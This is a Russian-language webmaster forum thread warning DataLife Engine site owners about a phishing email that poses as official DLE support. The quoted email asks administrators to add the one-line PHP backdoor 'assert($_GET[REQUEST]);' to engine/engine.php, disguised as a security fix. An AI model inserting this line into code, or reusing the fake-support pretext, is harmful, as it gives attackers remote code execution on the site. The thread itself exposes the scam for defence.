Бормотухи.НЕТ

Вернуться   Бормотухи.НЕТ > Web-мастеру > DataLife Engine
Расширенный поиск

DataLife Engine Скачать хаки для DLE, темы для DLE

Ответ
 
Опции темы Поиск в этой теме
Старый 24.10.2014, 19:29 Вверх   #1
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
Восклицание Внимание!!! Развод админов на счет уязвимости /engine/engine.php

Сегодня получил письмо в котором сообщалось от имени официального сайта DLE о критической уязвимости. Вот только отправлено оно было с формы обратной связи. Если Вы получите данное письмо - знайте. Это попытка взлома Вашего сайта через банальный развод администратора.

Данное письмо вам отправил support@dle-news.ru с сайта http://rutut.com/

------------------------------------------------
Текст сообщения
------------------------------------------------

Здравствуйте, уважаемый клиент!



Благодарим Вас за использование на Вашем сайте rutut.com нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: rutut.com/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_GET[REQUEST]);


С уважением,

Служба поддержки «DataLife Engine»

IP адрес отправителя: 162.244.33.213
  Ответить с цитированием
2 пользователя(ей) сказали cпасибо:
Старый 24.10.2014, 19:39 Вверх   #2
# About Fоrum NH
 
Аватар для RASHER
RASHER вне форума
Доп. информация
По умолчанию

Serberg, приходило такое письмо, я их на 3 весёлых буквы послал в ответ.) Жду от них следующего сообщения с новой уязвимостью...
  Ответить с цитированием
Старый 24.10.2014, 23:37 Вверх   #3
Просто блондинка
 
Аватар для Luvilla
Luvilla вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Serberg Посмотреть сообщение
Сегодня получил письмо
ты тоже? за это надо выпить... ))
  Ответить с цитированием
Старый 24.10.2014, 23:48 Вверх   #4
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
По умолчанию

Luvilla, у меня на dle очень много сайтов... вот на один и пришло письмецо. )
  Ответить с цитированием
Cказали cпасибо:
Старый 25.10.2014, 00:27 Вверх   #5
Просто блондинка
 
Аватар для Luvilla
Luvilla вне форума
Доп. информация
По умолчанию

Serberg, это просто великолепно! фантазия у хакеров работает в правильном направлении))
  Ответить с цитированием
2 пользователя(ей) сказали cпасибо:
Старый 25.10.2014, 14:52 Вверх   #6
# About Fоrum NH
 
Аватар для RASHER
RASHER вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Luvilla Посмотреть сообщение
фантазия у хакеров работает в правильном направлении))
Оффтоп
  Ответить с цитированием
Старый 25.10.2014, 14:55 Вверх   #7
Просто блондинка
 
Аватар для Luvilla
Luvilla вне форума
Доп. информация
По умолчанию

Оффтоп
  Ответить с цитированием
Старый 29.10.2014, 06:37 Вверх   #8
Коренной житель
 
Аватар для redak
redak вне форума
Доп. информация
По умолчанию

Надо - же, спасибо за инфу.
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Текущее время: 13:27. Часовой пояс GMT +3.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2018, vBulletin Solutions, Inc. Перевод: zCarot
 

Время генерации страницы 0.07823 секунды с 13 запросами